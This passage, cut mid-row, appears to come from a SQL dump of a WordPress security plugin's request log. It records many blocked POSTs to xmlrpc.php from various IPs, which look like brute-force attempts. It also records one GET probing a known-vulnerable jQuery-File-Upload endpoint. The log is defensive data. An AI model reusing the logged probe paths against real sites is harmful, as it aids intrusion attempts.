Firefox\\/20.6.14\"}','H4qPA8Eb3tzSQruwNgVUBX1s',0,1679978574.6093,782,'','POST',403,0,515,0,1,'',0),('175.178.47.143',2947690383,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','b1oTX4dAYvl2PUiIQEWkD5gs',0,1679978593.7695,1485,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','wrUQ2iavHVDF9ts6XhKqJRfM',0,1679978593.8837,1538,'','POST',403,0,515,0,1,'',0),('157.245.192.133',2650128517,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Mxl530cDPgGK7tdnO8Ie1E9Y',0,1679978603.1051,716,'','POST',403,0,515,0,1,'',0),('43.154.142.51',731549235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','TayPVzZcpqk9jbAe3w0L7rsY',0,1679981372.3705,4833,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','6JOrGUMPbKxl84tfuHwis9nW',0,1679981375.9272,1431,'','POST',403,0,515,0,1,'',0),('194.233.65.8',3270066440,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','lhOoe2qAu3FVNXcZyCabJ419',0,1679981383.3833,540,'','POST',403,0,515,0,1,'',0),('62.210.185.4',1053997316,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gyt3DbdKL8o40uxUAnYa1eOB',0,1679981386.2163,564,'','POST',403,0,515,0,1,'',0),('192.64.117.71',3225449799,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','ryX9lmBvuWSUjsORZAqwF52p',0,1679981400.3200,1450,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qrEvUfGFjyWL5P0lbISTOK8R',0,1679981405.8313,793,'','POST',403,0,515,0,1,'',0),('67.227.167.13',1138992909,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','IoHNyQVRLGnlAZ4h8TUD1OS3',0,1679986967.7587,4481,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','7bcEfF91aT8MuHLXvsRpW0rd',0,1679986968.7585,4404,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','duD30oxh9TvLRwZCJVFnNql6',0,1679986969.5019,3663,'','POST',403,0,515,0,1,'',0),('66.29.132.64',1109230656,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','boEZq46FfhsnXz9VL2G0I1HY',0,1679986979.3989,597,'','POST',403,0,515,0,1,'',0),('35.187.109.22',599485718,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','AMuy7UXO9IPogwzbYhj0RT3l',0,1679986980.9959,637,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','cdN0kDT5urKESY8qfGmMHeF6',0,1679986991.0672,804,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','IVip0K7wMW3lyEnGefLTQgZ5',0,1679986991.6852,839,'','POST',403,0,515,0,1,'',0),('35.187.109.22',599485718,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','CT7AqjmXpFsazlUwSkc2xvhH',0,1679986998.6605,2789,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','Hczf6Cws7hZxKqnTpY23VJey',0,1679986999.8572,1632,'','POST',403,0,515,0,1,'',0),('103.28.36.122',1729897594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','7AGZCnsjbf8hWkVK5MzoIQBl',0,1679987009.2501,1619,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','f45vKVLC9By7ichmUINuksWR',0,1679987010.6432,1641,'','POST',403,0,515,0,1,'',0),('82.165.85.137',1386567049,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ICteLODYi4xANm9sW5o136jX',0,1679991355.2937,4483,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','ahsiD2gY7mMylOLJdW0VcSwQ',0,1679991357.9101,2243,'','POST',403,0,515,0,1,'',0),('95.163.104.122',1604544634,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','CKLh5csu8ANrvOxwzo2Xk1Wb',0,1679991357.0340,3517,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','0Hc3GOSy1Ni7Btwr2JUFm95k',0,1679991367.2968,555,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','PTwSGOWiI5rJ0zAELqM7Q2U6',0,1679991369.2201,602,'','POST',403,0,515,0,1,'',0),('188.166.86.232',3165017832,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','WjcgDUS5eHupdo8N2a6RLG3i',0,1679991377.9611,553,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','QmBH0fsixZFqpK8TNJRe3dwA',0,1679995806.7696,2208,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','CwH8OcAxFtg9YhQIVpK4uZBs',0,1679995807.0868,2661,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','yoI0qweQhC2j75AgVdmHb8uM',0,1679995821.2218,579,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','Fv240herVZ8IlMckgBuDTJo9',0,1679995823.1585,589,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','lA9Lv6EjHgUOmw7ZnQT0dJtV',0,1679995839.4632,794,'','POST',403,0,515,0,1,'',0),('162.0.232.117',2717968501,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','hwSLUmtERHCaMDePkBxs4lr2',0,1679995840.0798,740,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0ikK5aRFqBI6vbNtPhryw4oT',0,1679995844.4339,657,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','yGRwD1fUHkCj2pbcuv3BhdAW',0,1679995857.3544,2786,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','JtycQrC5NeBjkb8T1dIGxRhP',0,1679998600.0926,1526,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','j2Imp6Uo9ATPCONDhfyEil4q',0,1679998602.7792,657,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','xyZS1E8fb3XvghdAR65BFutK',0,1679998603.8285,692,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','ZwQOVUbxis7BeDYK6RSaN4tL',0,1679998613.0665,920,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','s2XS54OWVho8uREZGejkITxz',0,1679998613.5616,870,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','mzKav2AlGUX358xHNBtboik4',0,1679998621.1148,602,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','duio9lJwjagx176BEZ4LM3QW',0,1680005363.7649,753,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ZRuHpCEVTJ3j4G58nvzAdkob',0,1680005369.8866,1369,'','POST',403,0,515,0,1,'',0),('82.165.89.43',1386567979,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','GlIKcME9hDjfkuxNypC1iRSw',0,1680005370.0449,1374,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','x6unvEOqkZAz9QLGpfdHcoly',0,1680005372.8196,661,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','wodyc05hpEB8kYWx1jrflVmT',0,1680005378.2220,619,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','WA8QiFGjEb9kDXYgPvtC0meu',0,1680005381.8933,603,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VWkPFiIfcBJUjXnuv3s47169',0,1680005388.6069,1358,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2Fcustomize.php%3Freturn%3D%252Fwp-admin%252Fplugins.php&reauth=1\"}','Xe1pHBh2w4yk58EGbjIfz6Ox',3,1680008671.8579,456,'','POST',302,0,600,0,1,'',510),('194.38.23.179',3257276339,'','http://cmdev-site1.com/admin/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','qNoJnt6uFcLkb2xTl18gCfew',0,1680008929.2925,1460,'','GET',403,0,700,0,1,'',0),('103.86.47.5',1733701381,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','Wsut1qrUjhbEXep9gzJ3HdRv',0,1680010881.6514,3901,'','POST',403,0,515,0,1,'',0),('74.208.59.202',1255160778,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','pzxd2XCFUoskrZguEmj76PYb',0,1680010886.0904,609,'','POST',403,0,515,0,1,'',0),('194.163.160.40',3265503272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','qKnbmY34Ox7Suj62ztl9AHVs',0,1680010895.2262,568,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','ST061ohXtwbUE5sRBPcnzmfq',0,1680010903.4276,620,'','POST',403,0,515,0,1,'',0),('206.189.136.160',3468527776,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','6spaVg4MynvFfbc9CJYe5BPR',0,1680010904.5002,602,'','POST',403,0,515,0,1,'',0),('43.154.142.51',731549235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','F9tSJhBRTC43E7HY8qeUgPlf',0,1680010906.2499,590,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','q1NKTZDsjX93hw6JB5V2Cfoc',0,1680010920.4689,584,'','POST',403,0,515,0,1,'',0),('198.71.235.41',3326602025,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','ibXQoBaFJHj9SRN4tcTWe3Y7',0,1680014481.8925,3808,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','DMhjrFKb4NO7coqkEYzfCsmn',0,1680014486.5476,1524,'','POST',403,0,515,0,1,'',0),('176.126.165.71',2961089863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','AHyczoviD0NI5VCsX2ZK3qgu',0,1680014489.8669,565,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','zAgyYO6roZuXIUV59EJieGbp',0,1680014491.4044,776,'','POST',403,0,515,0,1,'',0),('173.231.215.101',2917652325,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','TSMDWElwC0n7ryt3xBfzuVQY',0,1680014500.6651,2680,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','QvROnfPrTagyU6ktS4dX2iEl',0,1680014501.6499,2236,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','apRqv8XsKzgMy1JBA0FjU5uI',0,1680014508.0373,632,'','POST',403,0,515,0,1,'',0),('185.107.213.64',3110851904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','3Dt0wodUOSY4uXAyGClRK1aJ',0,1680014513.3478,1828,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','OqF8PGTsw7a6K1jguAm5ikRv',0,1680014519.4437,3497,'','POST',403,0,515,0,1,'',0),('92.81.223.229',1548869605,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','SFOEYpil7AsRICgxreH3M6ZJ',0,1680014520.4389,4118,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','M2yVD6oastW3vFwKd0BENP8f',0,1680014521.6559,3720,'','POST',403,0,515,0,1,'',0),('198.71.226.45',3326599725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','ZlF3dnJQb7Dy6HEtszKG9XpO',0,1680019126.1916,4571,'','POST',403,0,515,0,1,'',0),('66.29.132.64',1109230656,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZCBwWSLqYUoQgF4PmxkcXyni',0,1680019134.4808,571,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','uctO3rDGPwpNbnSZdTyzjKYC',0,1680019138.0109,786,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','QYRMGPT0Zzi1XEsuL4D9qFpa',0,1680019148.0869,622,'','POST',403,0,515,0,1,'',0),('184.168.98.17',3098042897,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','UAoufCjGxJ4WirDsFk20XqQ5',0,1680019150.9872,1497,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','mWOHpc8JaRKQjbvXdehulkI1',0,1680019169.9056,865,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','THZt0Bk8PAgGa2iFUKYnSO9X',0,1680021806.7528,3904,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','19mukl3JILQf5hz8WAvOprsG',0,1680021807.7151,2942,'','POST',403,0,515,0,1,'',0),('89.46.110.197',1496215237,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','gxsPbThy7MnwOG2aSUH6LQpl',0,1680021811.7112,570,'','POST',403,0,515,0,1,'',0),('185.182.57.16',3115727120,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','EWpLxmv76syetPKhdzc0aNgI',0,1680021815.0927,617,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','xtXE6IZTwJLd0c7fBkyQz1G9',0,1680021822.0775,668,'','POST',403,0,515,0,1,'',0),('39.104.85.137',661149065,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','jWA0xQHB3d4ZJuGOt9RNCnqv',0,1680021827.5414,607,'','POST',403,0,515,0,1,'',0),('120.27.216.32',2015090720,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','rl8vzw7kWynQhTY4eZqFPjVm',0,1680021835.9930,602,'','POST',403,0,515,0,1,'',0),('68.178.145.77',1152553293,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','TIe4ayqE92xnthXuM0kJOvlQ',0,1680021839.6429,566,'','POST',403,0,515,0,1,'',0),('35.187.109.22',599485718,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','CHXKARma9GuNZnPWb12eVkTi',0,1680021845.6591,649,'','POST',403,0,515,0,1,'',0),('104.192.5.191',1757414847,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 